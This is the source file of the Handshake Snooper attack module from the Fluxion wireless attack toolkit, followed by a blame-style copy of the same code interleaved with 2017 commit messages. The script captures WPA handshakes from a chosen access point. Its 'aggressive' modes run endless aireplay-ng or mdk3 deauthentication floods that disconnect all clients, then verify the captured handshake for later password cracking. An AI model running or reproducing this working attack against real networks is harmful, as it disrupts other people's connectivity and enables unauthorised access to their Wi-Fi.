fluxion/attacks/Handshake Snooper/attack.sh

#!/bin/bash

########################### < Handshake Snooper Parameters > ###########################

HandshakeSnooperState="Not Ready"

################################# < Handshake Snooper > ################################
function handshake_verifier_daemon() {
	if [ ${#@} -lt 5 ]; then return 1; fi

	handshakeVerifierState="running"

	function handle_verifier_abort() {
		handshakeVerifierState="aborted"
	}

	trap handle_verifier_abort SIGABRT

	source lib/HashUtils.sh

	local handshakeCheckResult=1 # Assume invalid
	while [ $handshakeCheckResult -ne 0 -a "$handshakeVerifierState" = "running" ]; do
		sleep 3
		pyrit -r $4 -o ${4/.cap/-clean.cap} stripLive
		hash_check_handshake $3 ${4/.cap/-clean.cap} "${@:5:2}"
		handshakeCheckResult=$?
	done

	# If handshake didn't pass verification, it was aborted.
	if [ $handshakeCheckResult -ne 0 ]; then return 1; fi

	mv "${4/.cap/-clean.cap}" "$2"

	# Signal parent process the verification terminated.
	kill -s SIGABRT $1
}

function handshake_stop_verifier() {
	if [ "$HANDSHAKEVerifierPID" ]; then
		kill -s SIGABRT $HANDSHAKEVerifierPID &> $FLUXIONOutputDevice
	fi

	HANDSHAKEVerifierPID=""
}

# Parameters: path, SSID, MAC
function handshake_start_verifier() {
	# if [ ${#@} -lt 3 ]; then return 1; fi
	handshake_verifier_daemon $$ \
	$FLUXIONPath/attacks/Handshake\ Snooper/handshakes/$APTargetSSIDClean-$APTargetMAC.cap \
	$HANDSHAKEVerifier $FLUXIONWorkspacePath/capture/dump-01.cap \
	"$APTargetSSID" "$APTargetMAC" &> $FLUXIONOutputDevice &
	HANDSHAKEVerifierPID=$!
}

function handshake_stop_deauthenticator() {
	if [ "$HANDSHAKEDeauthenticatorPID" ]; then
		kill $HANDSHAKEDeauthenticatorPID &> $FLUXIONOutputDevice
	fi

	HANDSHAKEDeauthenticatorPID=""
}

function handshake_start_deauthenticator() {
	if [ "$HANDSHAKEDeauthenticatorPID" ]; then return 0; fi

	# Prepare deauthenticators
	case "$HANDSHAKEMethod" in
		"mdk3"*) echo "$APTargetMAC" > $FLUXIONWorkspacePath/mdk3_blacklist.lst
	esac

	# Start deauthenticators.
	case "$HANDSHAKEMethod" in
		"aireplay-ng"*) xterm $FLUXIONHoldXterm $BOTTOMRIGHT -bg "#000000" -fg "#FF0009" -title "Deauthenticating all clients on $APTargetSSID" -e \
						aireplay-ng --deauth=9999999999 -a $APTargetMAC --ignore-negative-one $WIMonitor &
			HANDSHAKEDeauthenticatorPID=$!;;
		"mdk3"*) xterm $FLUXIONHoldXterm $BOTTOMRIGHT -bg "#000000" -fg "#FF0009" -title "Deauthenticating all clients on $APTargetSSID" -e \
				 mdk3 $WIMonitor d -b $FLUXIONWorkspacePath/mdk3_blacklist.lst -c $APTargetChannel &
			HANDSHAKEDeauthenticatorPID=$!;;
	esac
}

function handshake_stop_captor() {
	if [ "$HANDSHAKECaptorPID" ]; then
		kill $HANDSHAKECaptorPID &> $FLUXIONOutputDevice
	fi

	HANDSHAKECaptorPID=""
}

function handshake_start_captor() {
	if [ "$HANDSHAKECaptorPID" ]; then return 0; fi

	xterm -hold -title "Handshake Captor (CH $APTargetChannel)" $TOPRIGHT -bg "#000000" -fg "#FFFFFF" -e \
	airodump-ng -d $APTargetMAC -w $FLUXIONWorkspacePath/capture/dump -c $APTargetChannel -a $WIMonitor &

	sleep 3
	HANDSHAKECaptorPID=$(ps a | awk '$5~/^airodump-ng/ && $7~/'"$APTargetMAC"'/{print $1}')
}

function handshake_unset_method() {
	HANDSHAKEMethod=""
}

function handshake_set_method() {
	if [ "$HANDSHAKEMethod" ]; then return 0; fi

	local methods=("Monitor (${CYel}passive$CClr)" "aireplay-ng deauthentication (${CRed}aggressive$CClr)" "mdk3 deauthentication (${CRed}aggressive$CClr)" "$general_back")
	io_query_choice "Select a method of handshake retrieval" methods[@]

	HANDSHAKEMethod=$IOQueryChoice

	if [ "$HANDSHAKEMethod" = "$general_back" ]; then
		handshake_unset_method
		return 1
	fi
}

function handshake_unset_verifier() {
	HANDSHAKEVerifier=""
}

function handshake_set_verifier() {
	if [ "$HANDSHAKEVerifier" ]; then return 0; fi

	local verifiers=("pyrit" "aircrack-ng" "$general_back") # "pyrit (${CGrn}recommended$CClr)" "aircrack-ng (unreliable)")
	io_query_choice "Select a method of handshake retrieval" verifiers[@]

	HANDSHAKEVerifier=$IOQueryChoice

	if [ "$HANDSHAKEVerifier" = "$general_back" ]; then
		handshake_unset_verifier
		handshake_unset_method
		return 1
	fi
}

function unprep_attack() {
	HandshakeSnooperState="Not Ready"
	handshake_unset_verifier
	handshake_unset_method

	sandbox_remove_workfile "$FLUXIONWorkspacePath/capture"
}

function prep_attack() {
	# if [ ${#@} -ne 3 ]; then return 1; fi

	mkdir $FLUXIONWorkspacePath/capture

	while true; do
		handshake_set_method;	if [ $? -ne 0 ]; then break; fi
		handshake_set_verifier;	if [ $? -ne 0 ]; then continue; fi
		HandshakeSnooperState="Ready"
		break
	done

	# Check for handshake abortion.
	if [ "$HandshakeSnooperState" = "Not Ready" ]; then
		unprep_attack
		return 1;
	fi
}

function stop_attack() {
	handshake_stop_deauthenticator
	handshake_stop_verifier
	handshake_stop_captor
	handshake_unset_verifier
}

# Parameters: path, SSID, MAC
function start_attack() {
	handshake_start_captor
	handshake_start_deauthenticator
	handshake_start_verifier
}
# FLUXSCRIPT END
Refactored handshake capturing as an attack script. Most spaghetti code has be removed or replaced with better alternatives. Discarded dead/non-working code to allow for future reimplementation. Two types of attack are possible, passive, or aggressive using aireplay-ng or mdk3. A verifier daemon is now responsible for stopping captures and, optionally, deauthentication when a valid hash has been acquired. 2017-08-08 12:21:46 -06:00			`#!/bin/bash`

			`########################### < Handshake Snooper Parameters > ###########################`

			`HandshakeSnooperState="Not Ready"`

			`################################# < Handshake Snooper > ################################`
			`function handshake_verifier_daemon() {`
			`if [ ${#@} -lt 5 ]; then return 1; fi`

			`handshakeVerifierState="running"`

			`function handle_verifier_abort() {`
			`handshakeVerifierState="aborted"`
			`}`

			`trap handle_verifier_abort SIGABRT`

			`source lib/HashUtils.sh`

			`local handshakeCheckResult=1 # Assume invalid`
			`while [ $handshakeCheckResult -ne 0 -a "$handshakeVerifierState" = "running" ]; do`
			`sleep 3`
			`pyrit -r $4 -o ${4/.cap/-clean.cap} stripLive`
			`hash_check_handshake $3 ${4/.cap/-clean.cap} "${@:5:2}"`
			`handshakeCheckResult=$?`
			`done`

			`# If handshake didn't pass verification, it was aborted.`
			`if [ $handshakeCheckResult -ne 0 ]; then return 1; fi`

			`mv "${4/.cap/-clean.cap}" "$2"`

			`# Signal parent process the verification terminated.`
			`kill -s SIGABRT $1`
			`}`

			`function handshake_stop_verifier() {`
			`if [ "$HANDSHAKEVerifierPID" ]; then`
			`kill -s SIGABRT $HANDSHAKEVerifierPID &> $FLUXIONOutputDevice`
			`fi`

			`HANDSHAKEVerifierPID=""`
			`}`

			`# Parameters: path, SSID, MAC`
			`function handshake_start_verifier() {`
			`# if [ ${#@} -lt 3 ]; then return 1; fi`
			`handshake_verifier_daemon $$ \`
			`$FLUXIONPath/attacks/Handshake\ Snooper/handshakes/$APTargetSSIDClean-$APTargetMAC.cap \`
			`$HANDSHAKEVerifier $FLUXIONWorkspacePath/capture/dump-01.cap \`
			`"$APTargetSSID" "$APTargetMAC" &> $FLUXIONOutputDevice &`
			`HANDSHAKEVerifierPID=$!`
			`}`

			`function handshake_stop_deauthenticator() {`
			`if [ "$HANDSHAKEDeauthenticatorPID" ]; then`
			`kill $HANDSHAKEDeauthenticatorPID &> $FLUXIONOutputDevice`
			`fi`

			`HANDSHAKEDeauthenticatorPID=""`
			`}`

			`function handshake_start_deauthenticator() {`
			`if [ "$HANDSHAKEDeauthenticatorPID" ]; then return 0; fi`

Fixed an issue with the mdk3 deauthenticator. 2017-08-08 14:55:24 -06:00			`# Prepare deauthenticators`
			`case "$HANDSHAKEMethod" in`
			`"mdk3"*) echo "$APTargetMAC" > $FLUXIONWorkspacePath/mdk3_blacklist.lst`
			`esac`

			`# Start deauthenticators.`
Refactored handshake capturing as an attack script. Most spaghetti code has be removed or replaced with better alternatives. Discarded dead/non-working code to allow for future reimplementation. Two types of attack are possible, passive, or aggressive using aireplay-ng or mdk3. A verifier daemon is now responsible for stopping captures and, optionally, deauthentication when a valid hash has been acquired. 2017-08-08 12:21:46 -06:00			`case "$HANDSHAKEMethod" in`
			`"aireplay-ng"*) xterm $FLUXIONHoldXterm $BOTTOMRIGHT -bg "#000000" -fg "#FF0009" -title "Deauthenticating all clients on $APTargetSSID" -e \`
			`aireplay-ng --deauth=9999999999 -a $APTargetMAC --ignore-negative-one $WIMonitor &`
			`HANDSHAKEDeauthenticatorPID=$!;;`
			`"mdk3"*) xterm $FLUXIONHoldXterm $BOTTOMRIGHT -bg "#000000" -fg "#FF0009" -title "Deauthenticating all clients on $APTargetSSID" -e \`
Fixed an issue with the mdk3 deauthenticator. 2017-08-08 14:55:24 -06:00			`mdk3 $WIMonitor d -b $FLUXIONWorkspacePath/mdk3_blacklist.lst -c $APTargetChannel &`
Refactored handshake capturing as an attack script. Most spaghetti code has be removed or replaced with better alternatives. Discarded dead/non-working code to allow for future reimplementation. Two types of attack are possible, passive, or aggressive using aireplay-ng or mdk3. A verifier daemon is now responsible for stopping captures and, optionally, deauthentication when a valid hash has been acquired. 2017-08-08 12:21:46 -06:00			`HANDSHAKEDeauthenticatorPID=$!;;`
			`esac`
			`}`

			`function handshake_stop_captor() {`
			`if [ "$HANDSHAKECaptorPID" ]; then`
			`kill $HANDSHAKECaptorPID &> $FLUXIONOutputDevice`
			`fi`

			`HANDSHAKECaptorPID=""`
			`}`

			`function handshake_start_captor() {`
			`if [ "$HANDSHAKECaptorPID" ]; then return 0; fi`

			`xterm -hold -title "Handshake Captor (CH $APTargetChannel)" $TOPRIGHT -bg "#000000" -fg "#FFFFFF" -e \`
			`airodump-ng -d $APTargetMAC -w $FLUXIONWorkspacePath/capture/dump -c $APTargetChannel -a $WIMonitor &`

			`sleep 3`
			`HANDSHAKECaptorPID=$(ps a \| awk '$5~/^airodump-ng/ && $7~/'"$APTargetMAC"'/{print $1}')`
			`}`

			`function handshake_unset_method() {`
			`HANDSHAKEMethod=""`
			`}`

			`function handshake_set_method() {`
			`if [ "$HANDSHAKEMethod" ]; then return 0; fi`

			`local methods=("Monitor (${CYel}passive$CClr)" "aireplay-ng deauthentication (${CRed}aggressive$CClr)" "mdk3 deauthentication (${CRed}aggressive$CClr)" "$general_back")`
			`io_query_choice "Select a method of handshake retrieval" methods[@]`

			`HANDSHAKEMethod=$IOQueryChoice`

			`if [ "$HANDSHAKEMethod" = "$general_back" ]; then`
			`handshake_unset_method`
			`return 1`
			`fi`
			`}`

			`function handshake_unset_verifier() {`
			`HANDSHAKEVerifier=""`
			`}`

			`function handshake_set_verifier() {`
			`if [ "$HANDSHAKEVerifier" ]; then return 0; fi`

			`local verifiers=("pyrit" "aircrack-ng" "$general_back") # "pyrit (${CGrn}recommended$CClr)" "aircrack-ng (unreliable)")`
			`io_query_choice "Select a method of handshake retrieval" verifiers[@]`

			`HANDSHAKEVerifier=$IOQueryChoice`

			`if [ "$HANDSHAKEVerifier" = "$general_back" ]; then`
			`handshake_unset_verifier`
			`handshake_unset_method`
			`return 1`
			`fi`
			`}`

			`function unprep_attack() {`
			`HandshakeSnooperState="Not Ready"`
			`handshake_unset_verifier`
			`handshake_unset_method`

			`sandbox_remove_workfile "$FLUXIONWorkspacePath/capture"`
			`}`

			`function prep_attack() {`
			`# if [ ${#@} -ne 3 ]; then return 1; fi`

			`mkdir $FLUXIONWorkspacePath/capture`

			`while true; do`
			`handshake_set_method; if [ $? -ne 0 ]; then break; fi`
			`handshake_set_verifier; if [ $? -ne 0 ]; then continue; fi`
			`HandshakeSnooperState="Ready"`
			`break`
			`done`

			`# Check for handshake abortion.`
			`if [ "$HandshakeSnooperState" = "Not Ready" ]; then`
			`unprep_attack`
			`return 1;`
			`fi`
			`}`

			`function stop_attack() {`
			`handshake_stop_deauthenticator`
			`handshake_stop_verifier`
			`handshake_stop_captor`
			`handshake_unset_verifier`
			`}`

			`# Parameters: path, SSID, MAC`
			`function start_attack() {`
			`handshake_start_captor`
			`handshake_start_deauthenticator`
			`handshake_start_verifier`
			`}`
			`# FLUXSCRIPT END`